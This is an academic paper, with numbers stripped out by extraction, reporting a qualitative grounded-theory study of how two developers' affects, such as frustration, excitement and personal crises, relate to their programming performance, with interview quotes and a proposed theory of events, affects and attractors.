http://dx.doi.org/ . /peerj-cs. (barsade & gibson, ). although affects have been historically neglected in studies of industrial and organizational psychology (muchinsky, ), an interest in the role of affects on job outcomes has accelerated over the past fifteen years in psychology re- search (fisher & ashkanasy, ). in particular, the link between affects and work-related achievements, including performance (barsade & gibson, ; miner & glomb, ; shockley et al., ) and problem-solving processes, such as creativity (amabile et al., ; amabile, ), has been of interest for recent research. while research is still needed on the impact of affects to cognitive activities and work-related achievements in general, this link undeniably exists according to psychology research. we believe that it is important to understand the role of affects in software development processes and their impact on the performance of developers. the stance that performance and productivity are two interchangeable terms is assumed in this study, in line with fagerholm et al. ( ), petersen ( ) and meyer et al. ( ). it has been argued that software engineering has to produce knowledge that matters to practitioners (osterweil et al., ). indeed, we have shown elsewhere (graziotin, wang & abrahamsson, b) that practitioners are deeply interested in their affects while developing software, which causes them to engage in long and interesting discussions when reading related articles. we share lenberg, feldt & wallgren ( ) view that software engineering should also be studied from a behavioral perspective. we have embraced this view in previous studies—e.g., graziotin, wang & abrahamsson ( a), graziotin, wang & abrahamsson ( a) and have employed theories and measurement instruments from psychology to understand how affect impact o software developers’ performance under a quantitative strategy using experiments. however, in order to understand the human behavior behind affects and software development, there is a need to observe software developers in-action and perform interviews. so far, research has not produced qualitative insights on the mechanism behind the impact of affects on the performance of developers. we have called for such studies in the past (graziotin, wang & abrahamsson, a). moreover, a lack of theory in software engineering has been recently highlighted (johnson, ekstedt & jacobson, ). thus, we conducted a study laying down the theoretical answers to the research question how are developers’ experienced affects related to performance while programming? in this paper, we report an interpretive study of the impact of affects of developers on the software development performance. by deeply observing and open interviewing two developers during a development cycle, we constructed an explanatory theory, called type ii theory by gregor ( ), for explaining the impact of affects on development performance. the remainder of this paper is structured as follows. in the background section, we first briefly introduce what we mean with affects. we then review the related studies of affects and the performance of developers. then, we provide the theoretical framing of this study and the theory representation. the following section summarizes the methodology of this study by explicating our worldview and how we chose among the various options, the research design, the data analysis method, and the reliability procedures. we then report the results of our work, i.e., an explanatory theory of the impact of affects on programming performance, as well as a discussion and comparison with related work. the last section graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. concludes the paper by providing the contribution and implications of our study, the limitations, and the suggested future work. background in this section, we first briefly introduce what we mean with affects, and we review the papers in the software engineering field, where the affects of software developers have been taken into consideration with respect to performance. affect, emotion, and mood the fields of psychology have yet to agree on the definitions of affects and the related terms such as emotions, moods, and feelings (ortony, clore & collins, ; russell, ). several definitions for affects, emotions, and moods exist—to the point that ortony, clore & collins ( ) defined the study of affects as a “very confused and confusing field of study” (p. ). we are aware that some proposals have been established more than others. for example, plutchik & kellerman ( ) have defined emotions as the states of mind that are raised by external stimuli and are directed toward the stimulus in the environment by which they are raised. parkinson et al. ( ) have defined moods as emotional states in which the individual feels good or bad, and either likes or dislikes what is happening around him/her. in other words, mood has been defined as a suffused emotion, where no originating stimulus or a target object can be distinguished (russell, ). the issue with the proposed definitions, including those reported above, is that hundreds of competing definitions have been produced in just a few years (kleinginna & kleinginna, ) and a consensus has yet to be reached. there are also cultural issues to be considered. for example, emotion as a term is not universally employed, as it does not exist in all languages and cultures (russell, ). distinctions between emotions and moods are clouded, because both may feel very much the same from the perspective of an individual experiencing either (beedie, terry & lane, ). as emotions and moods may feel the same from the perspective of an individual, we have adopted the stance of several researchers in the various fields (schwarz & clore, ; schwarz, ; wegge et al., ; de dreu et al., ) and employed the noun affects (and affective states) as an underlying term for emotions and moods. we do not neglect moods and emotions per se. we opted to understand the states of minds of software developers at the issues of defining the concepts under study is not trivial and it deserves separate discussions. we point the reader to two of our recent articles (graziotin, wang & abrahamsson, c; graziotin, wang & abrahamsson, b), in which we have discussed the theoret- ical foundations, the various theories, and the classification frameworks for affects, emotions, and moods, and the common misconceptions that occur when studying these constructs. the affective level only, that is “one level below” moods and emotions. our choice was not unthoughtful. we have adhered to the core affect theory (russell, ; russell & barrett, ; russell, ), which employs affect as the atomic unit upon which moods and emotional experiences can be constructed. that is, in this article we do not distinguish between emotions and moods. we are interested in understanding how developers feel. related work lesiuk ( ) studied software engineers in a field study with removed treatment design. the aim of the study was to understand the impact of music listening on software removed treatment designs are part of single-group quasi-experiment designs. a removed treatment design allows one to test hypotheses about an outcome in the presence of the intervention and in the absence of the intervention (harris et al., ). a pre-treatment measure- ment is taken on a desired outcome; a treatment is provided; a post-treatment measurement is conducted; a second post-treatment measurement is conducted; the treatment is removed; a final measurement is performed (harris et al., ). design performance. the study was conducted over a five-week period. the design performance and the affects of the developers were self-assessed twice per day. for the first graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. week of the study (the baseline), the participants were observed in natural settings—that is, they worked as usual, doing what they do usually. during the second and third week, the participants were allowed to listen to their favorite music while working. however, during the fourth week, listening to music was not allowed. during the fifth week, the participants were allowed again to listen to the music. the results indicated a positive correlation of positive affects and listening to favorite music. positive affects of the participants and self-assessed performance were lowest with no music, but not statistically significant. on the other hand, narrative responses revealed the value of music listening for positive mood change and enhanced perception on software design performance. along a similar line, khan, brinkman & hierons ( ) theoretically constructed links from psychology and cognitive science studies to software development studies. in this construction, programming tasks were linked to cognitive tasks, and cognitive tasks were linked to affects. for example, the process of constructing a program—e.g., modeling and implementation—was mapped to the cognitive tasks of memory, reasoning, and induc- tion. khan, brinkman & hierons ( ) conducted two studies to understand the impact of affects on the debugging performance of developers. in the first study, positive affects were induced to the software developers. subsequently, the developers completed a quiz about software debugging. in the second study, the participants wrote traces of the execution of algorithms on paper. during the task, the affect arousal was induced to the participants. overall, the results of the two studies provided empirical evidence for a positive correlation between the affects of software developers and their debugging performance. we also conducted two studies to understand the connection between affects and the performance of software developers. in the first study (graziotin, wang & abrahamsson, a), we recruited computer science students to investigate the relationship between the affects of software developers and their performance in terms of creativity and analytic problem-solving. in a natural experiment, the participants performed two tasks chosen from psychology research that could be transposed to development activities. the partici- pants’ pre-existing affects were measured before each task. overall, the results showed that the happiest developers are better problem solvers in terms of their analytic abilities. the second study (graziotin, wang & abrahamsson, a) was a correlation study of real-time affects and the self-assessed productivity of eight software developers while they were performing a min programming task on a real-world project. the developers’ affects and their productivity were measured in intervals of min. through the fit of a linear mixed effects model, we found evidence for a positive correlation between the affects of developers associated to a programming task and their self-assessed productivity. in this study, we called for process-based studies on software teams which “are required in order to understand the dynamics of affects and the creative performance of software teams and organizations” (p. ). müller & fritz ( ) performed a study with participants, of which were profes- sional software developers and were phd students in computer science. the participants were asked to perform two change tasks, one for retrieving stackoverflow scores and the other to let users undo more than one command in the jhotdraw program. during the graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. development, the participants were observed using three biometric sensors, namely an eye tracker, an electroencephalogram, and a wearable wireless multi-sensor for physiological signals (e.g., heart rate, temperature, skin conductance). after watching a relaxing video, the participants worked on both tasks in a randomly assigned order. they were then interrupted after min of working or when they showed strong signs of emotions. during each interruption, the participants rated their affects using a psychology measurement instrument. after other min of work, the participants repeated the experiment design using the second task. finally, the participants were interviewed. overall, the study found that ( ) developers feel a broad range of affects, expressed using the two dimensional measures of valence and arousal instead of labeling the affects, ( ) the affects expressed as valence and arousal dimensions are correlated with the perceived progress in the task (evaluated using a – likert scale), ( ) the most important aspects that affect positive emotions and progress are the ability to locate and understand relevant code parts, and the mere act of writing code instead of doing nothing. on the other hand, most negative affects and stuck situations were raised by not having clear goals and by being distracted. so far, the literature review has shown that the number of studies regarding the affects and the performance of developers is limited. furthermore, the studies are all quantitative and toward variance theory. variance theories, as opposed to process theories, provide explanations for phenomena in terms of relationships among dependent and independent variables (langley, ; mohr, ). in variance theory, the precursor is both a necessary and sufficient condition to explain an outcome, and the time ordering among the independent variables is immaterial (pfeffer, ; mohr, ). strictly speaking, variance theory studies are hypothesis-driven studies, which aim to quantify the relationship between two variables in their base case. process research is concerned with understanding how things evolve over time and why they evolve in they way we observe (langley, ). according to langley ( ), process data consist mainly of “stories”—which are implemented using several different strategies—about what happened during observation of events, activities, choice, and people performing them, over time. mohr ( ) has contrasted process theory from variance theory by stating that the basis of explanation of things is a probabilistic rearrangement instead of clear causality, and the precursor in process theory is only a necessary condition for the outcome. in the literature review, a lack of theoretical and process-based studies was identified. for this reason, we aimed at developing a process-based theory. theoretical framework our theoretical framework was primarily based upon the affective events theory (aet) by weiss & cropanzano ( ) and the episodic process model of performance episodes by beal et al. ( ). aet has been developed as a high-level structure to guide research on how affects influence job satisfaction and job-related performance. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in aet, the work environment settings (e.g., the workplace, the salary, promotion opportunities, etc.) mediate work events that cause affective reactions, which are interpreted according to the individuals’ disposition. affective reactions then influence work-related behaviors. work-related behaviors are divided into affect-driven behaviors and judgment-driven behaviors. affect-driven behaviors are behaviors, decisions, and judgments that have immediate consequences of being in particular emotions and moods. one example could be overreacting to a criticism. judgment-driven behaviors are driven by the more enduring work attitudes about the job and the organization (weiss & beal, ). examples are absenteeism and leaving. as weiss & beal ( ) noted ten years after publishing aet, aet has often been erroneously employed as a theoretical model to explain affective experiences at work. however, aet is a macrostructure for understanding affects, job satisfaction in the workplace, and to guide future research on what are their causes, consequences, and explanations. more specifically, aet is not a framework to explain the performance on the job, neither is it a model to explain the impact of all affects on job-related behaviors. in their conceptual paper, beal et al. ( ) provided a model that links the experiencing of affects to individual performance. beal et al. ( ) model is centered around the conceptualization of performance episodes, which relies on self-regulation of attention regarding the on-task focus and the off-task focus. the cognitive resources towards the focus switch is limited. affects, according to beal et al. ( ), hinder the on-task performance regardless of them being positive or negative. the reason is that affective experiences create cognitive demand. therefore, affective experiences, according to this model, influence the resource allocation towards off-task demand. theory construction and representation interpretive research is often conducted when producing theories for explaining phe- nomena (klein & myers, ). gregor ( ) examined the structural nature of theories in information systems research. gregor proposed a taxonomy to classify theories with respect to how they address the four central goals of analysis and description, explanation, prediction, and prescription. we employed the widely established gregor ( ) work as a framework for classifying and expressing our proposed theory. a type ii—or explanation—theory provides explanations but does not aim to predict with any precision. the structural components of a type ii theory are ( ) the means of representation—e.g., words, diagrams, graphics, ( ) the constructs—i.e., the phenomena of interests, ( ) the statements of relationships—i.e., showing the relationships between the constructs, ( ) the scope—the degree of generality of the statements of relationships (e.g., some, many, all, never) and statements of boundaries, and ( ) the causal explanations which are usually included in the statements of relationship. while conducting this study, we ensured the constructed theory was composed of these elements. our study attempts to broaden our understanding of topics that are novel and unexplored in our field. rindova ( ) warned us that “novelty, however, comes at a cost: novel things are harder to understand and, especially, to appreciate” (p. ). graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. therefore, we have to proceed carefully in the theory building process. the risk is to get lost in complex interrelated constructs in a confused and confusing field of study (ortony, clore & collins, ) brought in the complicated, creative domain that is software engineering. furthermore, barsade & gibson ( ) advised researchers that, when understanding emotion dynamics, the bigger is the team under observation, the more complex and complicated are the team dynamics. bigger teams have complicated, and even historical, reasons that are harder to grasp—triggering a complex, powerful network of affects (barsade & gibson, ). therefore, there is the need to keep the phenomenon under study as simple as possible. for novel theory development, philosophers and economists often—but not always—draw from their own personal observation and reasoning, while still being able to offer a sound empirical basis (yeager, ). theorizing from the ivory tower can complement the scientific method by offering insights and discovering necessary truths (yeager, ), to be further expanded by empirical research. our empirical stance makes us eager to jump to data and start theorizing; yet, we need to take some precautionary measures before doing this. when novel theories are to be developed in new domains, such as software engineering, a small sample should be considered (järvinen, ). a small sample enables the develop- ment of an in-depth understanding of the new phenomena under study (järvinen, ) and to avoid isolation in the ivory tower. our research follows carefully järvinen ( ) recommendations, which is reflected in our study design. weick ( ) classic article is of the same stance by reporting that organizational study theories are approximations of complex interrelated constructs of human nature that often have small samples. those works are often seen as substitutes of theory studies, but they often represent “struggles in which people intentionally inch toward stronger theories” (ibid, p. ). such struggles are needed when a phenomenon is too complex to be captured in detail (weick, ). these issues were taken into account when we designed our study, which is demonstrated in the following section. methodology we describe our research as a qualitative interpretive study, which was based on face-to- face open-ended interviews, in-field observations, and e-mail exchanges. given the aim of the study, there was the need to make sense of the developers’ perceptions, experiences, interpretations, and feelings. we wanted to conduct open-ended interviews where the realities constructed by the participants are analyzed and reconstructed by the researcher. our epistemological stance for understanding these social constructs and interactions has been interpretivism, which we make coincide with social constructivism in line with other authors (easterbrook et al., ). interpretive data analysis has been defined succinctly by geertz ( ) as “really our own constructions of other people’s constructions of what they and their compatriots are up to” (p. ). interpretivism is now established in information systems research (walsham, ), but we see it still emerging in software engineering research. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. design as per our chosen design, the participants could be free to undergo the development of the system in any way, method, practice, and process they wished to employ. our study comprised of regular scheduled face-to-face meetings with recorded interviews, impromptu meetings which could be called for by the participants themselves, e-mail exchanges, in-field observations, and a very short questionnaire right after each commit in the git system (explained in section reliability). therefore, the participants had to be aware of the design itself, although they were not informed about the aims of the study. the participants’ native language is italian, but they have been certified as proficient english speakers. the first author of the present article employs italian as first language as well, and he was the reference person for the participants for the duration of the entire study. the other two authors of the present article have been certified as proficient and upper intermediate in italian. the choice for the design of the study was therefore to conduct the interviews in italian, as the native language let the participants express their opinion and feelings in the richest, unfiltered way (van nes et al., ). the interviews were subsequently transcribed in english as suggested by the common research practices (van nes et al., ; squires, ), but the present case had the added value that the authors could validate the transcripts with the participants over the course of the study, given their advanced proficiency in english. the in-field observations were performed by two of the present authors, and the personal communications such as e-mails or some impromptu meetings were exchanged between the first author of the study and the participants. the coding activities have been a collaborative effort among all the authors of this study. in order to keep the study design and results as simple as possible and to provide precise answers to the research question, in line with what we stated in the section theory construction and representation, we observed activities that produced code. other artifacts such as requirements and design were not taken into consideration. furthermore, our strategy to limit the complex network of triggered affects was to group and study them into the two well-known dimensions of positive and negative affects (watson, clark & tellegen, ), which assign the affects—including those perceived as neutral—in a continuum within the two dimensions. our design took into account ethical issues, starting with a written consent to be obtained before starting any research activity. the consent form informed the participants of our study in terms of our presence, activities, data recordings, anonymity and data protection, and that their voluntary participation could be interrupted at any time without consequences. they were also informed that any report of the study had to be approved by them in terms of their privacy, dignity protection, and data reliability before it was disclosed to any third party. furthermore, as an extra measure, any additional, personal data coming from e-mail exchanges and some impromptu meetings with a single author was approved by the participants before inclusion to the study data. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data analysis grounded theory has been indicated to study human behavior (easterbrook et al., ), and it is suitable when the research has an explanatory and process-oriented focus (eisenhardt, ). qualitative data analysis techniques from grounded theory responded to our needs (langley, ). we are aware that there has been some heated debate regarding which, between glaser & strauss ( ) or corbin & strauss ( ), is the grounded theory qualitative strategy (creswell, ) or if it can be employed merely as a tool to analyze qualitative data (kasurinen, laine & smolander, ). heath & cowley ( ) comparison study concludes that researchers should stop debating about grounded theory, select the method that best suits their cognitive style, and start doing research. we agree with them and adopted charmaz ( ) social constructivist grounded theory approach as a tool to analyze qualitative data coming from face-to-face open-ended interviews, in-field observations, and e-mail exchanges. the adaption of grounded theory by charmaz ( ) has merged and unified the major coding techniques into four major phases of coding, which are initial coding, focused coding, axial coding, and theoretical coding. the four coding phases have been adopted in the data analysis process of this study. charmaz ( ) has often remembered her readers that no author on grounded theory methodology has ever really offered criteria for establishing what we should accept as a coding family, and that the coding phases are often overlapping, iterative and not strictly sequential within each iteration. this is true also for this study. an exemplar case of our coding activities is shown in fig. . the figure is divided into four columns. the first column provides an interview excerpt. the remaining columns show the intermediate results of the coding activities. the initial coding phase should stick closely to the data instead of interpreting the data. the researchers should try to see the actions in each segment of data, and to avoid applying pre-existing categories to it. therefore, charmaz ( ) has suggested to code the data on a line-by-line approach so that the context is isolated as much as possible, and to code the data as actions. in order to help focusing on the data as actions, it has been suggested to use gerunds. for example, in fig. the second column shows the initial codes assigned to a interview snippet. the second coding phase is the focused coding. focused code means that the most significant or frequent (or both) codes which appeared in the initial coding are employed to sift through larger amounts of data, like paragraphs, speeches, and incidents. this phase is about deciding which initial codes make the most analytic sense for categorizing the data. however, it is also possible to create umbrella codes as substitutes for other codes. during focused coding, the codes become more directed, selective, and conceptual. for example, as shown in fig. , the initial code “improving productivity through the use of st” was further abstracted as “improving productivity through a tool.” the third coding phase is the axial coding. the axial coding phase has been proposed by strauss & corbin ( ). as synthesized by charmaz ( ), the axial coding process follows the development of major categories, relates categories to subcategories, and relates them with each others. if during initial and focused coding the data is fractured into pieces, graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure example of coding phases for this study. the axial coding phase brings the data back together again. in this phase, the properties and the dimensions of a category are specified. the fourth column of fig. shows an iteration of axial coding. the fourth coding phase is the theoretical coding. theoretical coding was introduced by glaser ( ). as synthesized by charmaz ( ), the theoretical coding phase specifies how the codes from the previous phases related to each other as hypotheses to be integrated into a theory. it would be impractical to show the steps and complete examples of axial and theoretical coding as they would need several interview excerpts and resulting codes (charmaz, ). what we could demonstrate in fig. was that the interview excerpt was further coded in the later coding phases and became part of the evidence to support the key concepts, such as affect, and their components as shown in the fourth column. the overlapping of different categories over the same snippets indicated the potential linkage among them, which became the basis to develop the model proposed in this study. reliability here, we describe our procedures for enhancing the reliability of the gathered data and the results. the data was gathered using multiple sources. each interview was accompanied by handwritten notes, recordings, and related subsequent transcriptions. all in-field observations were accompanied by audio recordings after obtaining permission of the graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. participants. we wrote memos during the study. the transcriptions and the coding phases were conducted using atlas.ti . , which is a recognized instrument for such tasks. in order to make the participants focus on their affects and recall how they felt during performance episodes, we asked them to fill out a very short questionnaire at each git commit. the questionnaire was the self-assessment manikin (bradley & lang, ), which is a validated pictorial questionnaire to assess affects. we employed the questionnaire in a previous study (graziotin, wang & abrahamsson, a) as it proved to be quick (three mouse clicks for completing one) and not invasive. we employed the gathered data to triangulate the observational data and the interview data during each interview. if there was disagreement between the qualitative data (e.g., several positive affective episodes but negative quantitative results), we asked for further clarification from the participants to solve the discrepancies. as a further action to enhance reliability, but also ethicality of the study, we asked the participants to individually review the present paper in three different times. the first review session happened in the initial drafts of the paper when we solely laid down the results of the study. the second review session happened right before submitting the article. the third review session happened before submitting a revised version of the present article. for the reviews, we asked the participants to evaluate the results in terms of their own understanding of the phenomena under study and the protection of their identity and dignity. because of their valuable help, the proposed theory is shared with them and further validated by them. results and discussion the study was set in the context of a web- and mobile-based health-care information systems development between july and september . two software developers, who were conducting a semester-long real-world project as a requirement for their bsc theses in computer science, were put in a company-like environment. both developers, who we shall call p and p for anonymity reasons, were male. p was years old and p was years old. they both had about five years of experience developing web and mobile systems. p and p had their own spacious office serving as an open space, their own desks and monitors, a fast internet connection, flip-charts, a fridge, vending machines, and / access to the building. the developers accepted to work full time on the project as their sole activity. they were instructed to act as if they were in their own software company. indeed, the developers were exposed to real-world customers and settings. the customers were the head of a hospital department, a nurse responsible for the project, and the entire nursing department. the development cycle began with a first meeting with the customer, and it ended with the delivery of a featureful first version of the working software. it is beneficial to the reader to provide a brief summary of the main events, which have been extracted from our in-field memos. during the first week, p had to work on the project without p . p failed to show up at work. during the first days, p gave brief explanations about the absence, e.g., housework or sickness. however, the explanations stopped quickly, and p stopped answering to text messages and phone calls. at the graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. beginning of the second week, p showed up at work. p had some private issues, which brought some existential crisis. p was initially reluctant to welcome p in the development, as all the code so far was p ’s creation. the first two days of collaboration brought some tension between the team members, crippled experimentation with the code, and a shared loss of project vision. on the third day of the second week, the team tensions exploded in a verbal fight regarding the data structures to be adopted. at that point, one of the present authors was involved in the discussion. the researcher invited the participants to express their opinion and acted as mediator. a decision was eventually made. the initial tensions between the developers began to vanish, and the work resumed at a fair pace. at the end of the second week, p and p had a further requirements elicitation session with the customer represented by the head nurse. the development appeared to be back at full speed, and a full reconciliation could be observed between the participants. the progresses succeeded one day after another, and the fully working prototype was demoed and tested during the sixth week. face-to-face open-ended interviews happened at the beginning of the project during scheduled meetings and impromptu shorter meetings called by the researchers or by the participants. the impromptu meetings were held mostly because of trivial issues, like casual chatting which turned into a proper interview. only in one case was an impromptu meeting called by p when he finally came back to work. we also did not distinguish between the data coming from the scheduled meetings and the impromptu meetings. the interviews were open-ended and unstructured, but they all began with the question how do you feel? in-field observations happened on an almost daily basis. the participants were informed if they were recorded. we recorded a total of min of interviews. finally, data was gathered via the exchange of thirteen emails. the transcripts of the interviews were completed immediately after the interviews were concluded. the initial coding phase produced unique codes. the focused coding phase was focused on the individual’s experiences of the development process, and it produced codes. figure provides an example of our coding activities. the axial coding and the- oretical coding produced six themes, which are explained in this section. inconsistencies between the qualitative data and the data from the self-assessment manikin questionnaire happened three times during the entire study. all three discrepancies were minor, and they were immediately solved upon clarification from the participants. for example, in one case the participant p reported low values of valence and arousal, and a neutral value for dominance. during the interview, p often stated that he had a frustrating day, but there were no mentions of low-arousal negative affects. when asked to explain how the self-assessment manikin values were representative of the work day, the participant added that he felt low esteem, which was caused by episodes of frustration. overall, p was unexcited and lost over the day; thus the reported low value for arousal. this section provides the proposed theory. the theory is represented in fig. . we describe the discovered themes and categories (boxes) and their relationships (arrows). while type ii theories are not expected to discuss causal explanations in terms of direction and magnitude (gregor, ), we offer them as they were interpreted from the data. each graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a theory of the impact of the affects on programming performance. relationship is accompanied by a verb, which describes the nature of the relationship. where possible, we precede the verb with some plus (+) or minus (−) signs. a plus (minus) sign indicates that we theorize a positive (negative) effect of one construct to another. a double plus (double minus) sign indicates that we theorize a strong positive (strong negative) effect of one construct to another with respect to a proposed weaker alternative. the reader should bear in mind that our theorized effects are not to be strongly graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. interpreted quantitatively. that is, a double plus sign is not the double of a single plus sign or an order more of magnitude of a single plus sign. every entity and relationship is supplied with interview quotes, codes, and related work. events the events are perceived from the developer’s point of view as something happening. events resemble psychological objects, which were defined by russell ( ) as “the person, condition, thing, or event at which a mental state is directed” (p. ) but also at which a mental state is attributed or misattributed. events may be non work-related—e.g., family, friends, house, hobbies—or they may be work-related—e.g., the working environment, the tools, and the team members. the interview quotes and , and in-field memo are examples of work-related events, while interview quote is not related to work. . “suddenly, i discovered google plus bootstrap, which is a bootstrap theme resembling google+. [i implemented it and] it was easy and looking good.”—p . “i found a typo in the name of the key which keeps track of the nurse id. the bug was preventing a correct visualization of patient-related measurements. fixing the bug is very satisfying, because i can now see more results on the screen.”—p . p , talking to p and visibly irritated “again this? you still have not understood the concept! it is <component name>that is static, while the measurement changes!” . “this morning i received a message with some bad news related to my mother. i imme- diately desired to abandon development in order to solve the possible issue. the focus was more on that issue than on any other issue at work.”—p we further distinguish public events from private events. public events are those that could be observed by a third person. the in-field memo is an exemplar public event. private events are known to oneself only, even if they are coming from the real world. for example, the event described in interview quote was real and coming from the real world. however, it was not observable by a third person. events have often an episodic nature, as p and p noted on several occasions. however, private events can also be reflections, realizations, memories, and situations as with psychological objects. . interviewer: “have you focused better on your programming task today?” p : “yes, today went better [than usual]. it’s probably when you do that [programming] alone that i am more.. it is more difficult, to write code. when i am working with somebody it goes better, you can work better.” in the interview quote , p described the general situation, or a summary of the work day events with respect to usual situations. situations can be causation chains or aggregation of previous events. the participants do not need to be aware of events as merely events or as situations as it does not make any difference to them. we are not representing situations in fig. because we still consider them as events. the rest of the paper provides numerous other examples of events. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. affects during the development process, several affects have been triggered by events and felt by the developers. we coded only affects which had been directly mentioned by p and p . the following are the detected positive and negative affects (respectively) being felt during the development cycle. accompanied, accomplished, attracted, contented, dominating, enjoyed, excited, fun, good, gratitude, happy, illuminated, motivated, , optimistic, positive, satisfied, serene, stimulated, the careful readers might turn up their nose here. as we wrote in graziotin, wang & abrahamsson ( b) affects are not motivation, as they are not job satisfaction, etc. yet, affects are important components of these psychological constructs, and studying complex multifaceted constructs like motivation would require different approaches and different measurement instruments. for this reason, if the participants only stated that they felt motivated or satisfied, we considered them as affects, as it might well be the case that they were expressing emotional judgments about such constructs. in any case, the inclusion or exclusion of such terms as affects would not change the results of this study. supported, teased, welcomed. angry, anxious, bored, demoralized, demotivated, depressed, devastated, disinterested, dominated, frustrated, guilty, loneliness, lost, negative, pissed off, sad, stagnated, unexcited, unhappy, unsatisfied, unstimulated, unsupported, worried. our qualitative results on the perceived affects agree with the quantitative results of wrobel ( ) and müller & fritz ( ), which indicated that developers do feel a very broad range of affects in the software development process. examples of events that caused positive and negative affects (respectively), coded using the gerund principle of charmaz ( ) method for analyzing qualitative data, are the following. ‘feeling contented because a very low number of code changes caused big achievement in terms of quality [or functionality],’ ‘feeling gratitude towards a tool,’ ‘feeling attracted by a junk of code because of anticipating its value for the end user,’ ‘feeling motivated because personal issues are now out clear,’ ‘feeling supported because of the brought automation of a framework,’ ‘feeling serene because of a low workload right after a high workload,’ ‘feeling happy because of sensing the presence of a team member after reconciliation.’ ‘feeling alone [or unsupported] while working [or by a team member],’ ‘feeling anx- ious because of a sudden, not localizable bug that ruined the day,’ ‘feeling anxious by not understanding the code behavior,’ ‘feeling bored by implementing necessary but too static details [e.g., aesthetic changes instead of functionalities],’ ‘feeling frustrated by the different coding style of a team member,’ ‘feeling angry by failing to integrate [or extend] an external component,’ ‘feeling stagnated in life [or job, or studies],’ ‘feeling unstimulated because of a too analytic task.’ according to previous research, psychological objects—sometimes in the form of events, sometimes as stimula—trigger affects all the time, and an individual is under a particular affect or a blend of affects all the time (russell, ). sometimes, these affects will be perceived strongly. sometimes, they will not be perceived at all despite their presence. a failure to attribute an affect to an event does not demise the affect itself. this affect misattribution coincides with some theories of moods (fisher, ; weiss & cropanzano, ), which consider affect as non attributed emotions or simply as free-floating, unattributed affect (russell, ). graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. attractors we observed that some events had a particular affective meaning to the participants. these affective experiences were assumed high importance to the participants with respect to other affective experiences; thus, we called them attractors. attractors are affects, which earn importance and priority to a developer’s cognitive system. at a very basic instance, they gain the highest possible priority and emphasis to a developer’s consciousness, to the point that behaviors associated to the attractor can be observed as it is experienced. an example can be offered by quote below. . p : “i did a really good job and fixed things also due to sublime text (st).” interviewer: “what has st done for you?” p : “when you copy/paste code around and refactor, st offers you at least three different ways for doing search and replace. it is really advanced.” interviewer: “would another tool make a difference to your work instead?” p : “with another editor or an ide it would be another story, especially if an editor tries to do too much, like eclipse. i think that the compromise between functionality and usability of st is way better.” interviewer: “do you think that st is enhancing your productivity then?” p : “absolutely. i was extremely excited by these features and they pushed me to do more and more.” interviewer: “were you actually thinking about this while you were working?” p : “definitely. first, i turned the monitor towards p and showed him the magic. but i felt good for the rest of the day, and i accomplished more than what i hoped i could do.” in interview quote , p offered an insight regarding the affects triggered by a software development tool. the excitement toward the tool features was an attractor to p . the attractor became central to the developer subjective conscious experience, not just an underlying affect. moreover, the behavior caused by the experience of the attractor was directly observable. interview quote emphasizes that attractors are not necessarily concerns or negative in nature. interview quote provides instead an example of a negative attractor. p realized that a non work-related event was not desirable, thus generating negative affects. what happened to his mother was important and demanded his attention. p was consciously experiencing the negative attractor, and the appraisal of such attractor had consequences to his way of working. attractors are not necessarily stronger than general affects for gaining a developer’s subjective conscious experience. they might just be there and still have an impact. we can access them retrospectively. interview quote is an example of such occurrence. . “i am not progressing.. in the working environment.. with my university career. with life. i feel behind everybody else and i do not progress. and i am not even sure about what i want to do with my life. i got no visual of this.”—p moreover, interview quote shows that attractors are not always caused by single events. attractors can become reflections on a series of events as a consequence of them and as a summation of them. graziotin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. another example of reflections of a series of events that have however an impact on a developer’s subjective consciousness is shown in interview quote . p was having a life crisis which resulted in a loss of the vision of his own life. . “when i was alone at home, i could not focus on my programming task. the thought of me not progressing with life did often come to my mind. there i realized that i was feeling depressed.”—p in interview quote , the participant had a negative depressed attractor with the attached meaning i am not progressing with life. the rumination associated with this attractor was strong and pervaded p personal experience and his everyday life of that period. attractors are part of the personal sphere as much as affects are—indeed, they are special affects for us. in the software process improvement literature, the term concern has been used as commitment enabler (abrahamsson, ). the commitments are formed in order to satisfy such concerns, i.e., needs (flores, ). attractors are not concerns as employed by abrahamsson ( ). an important difference is that concerns are linked to actions, i.e., actions are driven by concerns. on the other hand, attractors are affects, and affects are not necessarily concerns, nor do they necessarily cause immediate actions. under our current theoretical framework, a blend of affects constitutes an individual’s happiness, at least under the hedonistic view of happiness (haybron, ). according to this view, being happy coincides with the frequent experience of pleasure; that is, happiness is reduced to a sequence of experiential episodes (haybron, ). frequent positive episodes lead to feeling frequent positive affects, and frequent positive affects lead to a positive affect balance (diener et al., ). lyubomirsky, king & diener ( ) consider a person happy if the person’s affect balance is mainly positive. however, we have just stated in this section that some developers’ affects are more important than other affects. let us now be more specific. as argued by the philosopher haybron ( ), a quantitative view of happiness based solely on frequency of affects is psychologically superficial because some affects do not have distinct episodes or attributions 